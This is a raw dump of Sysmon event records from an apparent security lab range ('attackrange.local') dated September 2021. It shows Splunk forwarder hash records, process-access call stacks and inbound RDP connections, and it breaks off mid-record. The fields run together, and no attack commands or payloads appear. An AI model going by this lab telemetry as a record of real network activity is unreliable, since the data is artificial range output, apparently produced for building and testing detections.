Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047976Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:22.350{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=870AD9F5750208247BBD90DD94CC7E45,SHA256=772AB45755ABE9F6DF0C9B1C4F8A682A34C5FE4F7DEB7C6CD97B50F6D6CEB8DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976488Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:22.138{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A1C3F8AA2E268B294B12EFE3D0077F7,SHA256=C6983864EF68E989552946F8AEF002A1D31DC42302917709B076A429D22A6D93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976487Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:21.997{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92B8D35465737422F98502D06A597ECB,SHA256=F596BA41C6970E4A78D26A8CE4A3E685F60382EA037BA94EB3D6DA3EC3767123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047978Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:23.353{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EFED3CAD70B377B02FD020A1C6BBB52,SHA256=A5660F892B216609713386598974EE4D202B96340FFB43805F41E127ADDD6299,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976490Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:21.142{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-36875-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976489Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:22.999{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB97B1F3DA09B04F02D5F08641B7FB67,SHA256=D54581734FB46E62C9CFB785768D31026F3C1E740C582EB8F5B46FE658D3051B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047980Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:24.535{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047979Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:24.369{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAB5874458AA479B5AF4D61D27018CC,SHA256=4F1F14A73C114F623A241749A3CD03F3C5B93E67FC44AD4E814351E3422AF59E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976492Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:24.202{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1D4E8560ED45F5DDDE7AB13A453FB3D,SHA256=DC7A40AB6BD62501EDCAD52E5937D1165711DC38E40132001B33DB0D8B154983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976491Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:24.015{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57495E85DFA65E62C5E37F561BC2FEA2,SHA256=37BD1FE20E89AD43A593930911EC20CA6A4B8DE5B48B1730A0F96AFC573E0C8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047982Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:25.535{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A519511B0FED02E84EB86F3D38344AC,SHA256=EEE926E000D5159DE25F7DDA461C4AB171A682B7C56212FCC85D04AF3A47E552,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976508Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8865-6151-7A79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976507Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976506Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000976505Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:22.375{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51401-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976504Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976503Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976502Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976501Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976500Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976499Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976498Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976497Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8865-6151-7A79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976496Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.921{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8865-6151-7A79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976495Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.906{69CF5F33-8865-6151-7A79-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976494Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.249{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C3D2DE478A8213FC975E790A8A7A92C3,SHA256=29D98C8E3FC7ADAD4E988956E27AB968808151EA2EE9A48213FD34CD8D346FC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976493Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:25.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E58E9D225C348EF1AF415D65367A57BD,SHA256=7418EEA21161AC510902D93DDCADD41902CDC978C35E9BD4A02EEE4B7EC9B9E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047981Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:23.796{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49222-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047983Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:26.571{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA9BAB5FE982B497606E555C6BA6E080,SHA256=C7649D92122804602A13E9757F917A82B6AE6CA2EF0AD1CB744D99DBBBE9761F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976527Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:23.877{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59259-false10.0.1.12-8000- 354300x8000000000000000976526Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:23.194{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-48728-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000976525Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.718{69CF5F33-8866-6151-7B79-00000000FD01}3676416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976524Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8866-6151-7B79-00000000FD01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976523Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976522Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:26.530{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976521Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 